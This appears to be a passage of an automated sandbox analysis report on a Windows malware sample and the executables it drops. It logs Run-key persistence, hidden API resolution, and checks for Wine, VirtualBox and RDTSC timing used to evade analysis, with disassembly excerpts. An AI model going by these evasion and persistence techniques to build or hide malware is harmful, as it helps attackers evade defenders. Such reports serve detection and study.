Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ec8c5c339.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c593ec106.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c593ec106.exe	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_004195E0

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userKFHCAEGCBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\userKFHCAEGCBF.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\userKFHCAEGCBF.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443940 second address: 443944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443A9C second address: 443AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443AA2 second address: 443AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443AA8 second address: 443ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED556h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443ACB second address: 443AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F03 second address: 443F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F07 second address: 443F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F10 second address: 443F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED552h 0x00000009 jnl 00007FD1807ED546h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD1807ED552h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443F43 second address: 443F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FD180B5C156h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44651C second address: 44658B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov si, dx 0x0000000f push 00000000h 0x00000011 and ch, 0000003Bh 0x00000014 push 943A65A8h 0x00000019 pushad 0x0000001a push ebx 0x0000001b jl 00007FD1807ED546h 0x00000021 pop ebx 0x00000022 push edx 0x00000023 jmp 00007FD1807ED554h 0x00000028 pop edx 0x00000029 popad 0x0000002a add dword ptr [esp], 6BC59AD8h 0x00000031 sub esi, 5594CB6Dh 0x00000037 push 00000003h 0x00000039 add dh, 0000000Dh 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D2CC3h] 0x00000044 push 00000003h 0x00000046 pushad 0x00000047 cmc 0x00000048 mov ebx, dword ptr [ebp+122D2997h] 0x0000004e popad 0x0000004f push 499A4006h 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44670F second address: 446713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446713 second address: 446736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD1807ED559h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446736 second address: 446759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446759 second address: 44675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44675D second address: 446761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446761 second address: 4467B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD1807ED553h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FD1807ED552h 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D2C93h] 0x0000001e lea ebx, dword ptr [ebp+1245B3C8h] 0x00000024 jg 00007FD1807ED54Ch 0x0000002a push eax 0x0000002b push ebx 0x0000002c jnc 00007FD1807ED54Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446826 second address: 4468AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FD180B5C167h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FD180B5C15Dh 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 call 00007FD180B5C15Fh 0x0000001e mov ecx, dword ptr [ebp+122D2A17h] 0x00000024 pop edi 0x00000025 mov esi, eax 0x00000027 popad 0x00000028 push 00000000h 0x0000002a mov ecx, eax 0x0000002c mov edx, dword ptr [ebp+122D2C5Fh] 0x00000032 call 00007FD180B5C159h 0x00000037 jmp 00007FD180B5C15Dh 0x0000003c push eax 0x0000003d jmp 00007FD180B5C15Eh 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FD180B5C160h 0x0000004b mov eax, dword ptr [eax] 0x0000004d push eax 0x0000004e push edx 0x0000004f jnc 00007FD180B5C158h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4468AF second address: 4468BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD1807ED546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4468BA second address: 44694D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FD180B5C160h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FD180B5C158h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FD180B5C158h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 pushad 0x00000049 mov edi, dword ptr [ebp+122D33EDh] 0x0000004f or dword ptr [ebp+122D3543h], edi 0x00000055 popad 0x00000056 mov ecx, dword ptr [ebp+122D2CCFh] 0x0000005c push 00000000h 0x0000005e or ecx, dword ptr [ebp+122D322Ch] 0x00000064 push 00000003h 0x00000066 jmp 00007FD180B5C161h 0x0000006b push B5C169CDh 0x00000070 push eax 0x00000071 push edx 0x00000072 push ecx 0x00000073 push ebx 0x00000074 pop ebx 0x00000075 pop ecx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 44694D second address: 446953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446953 second address: 446957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
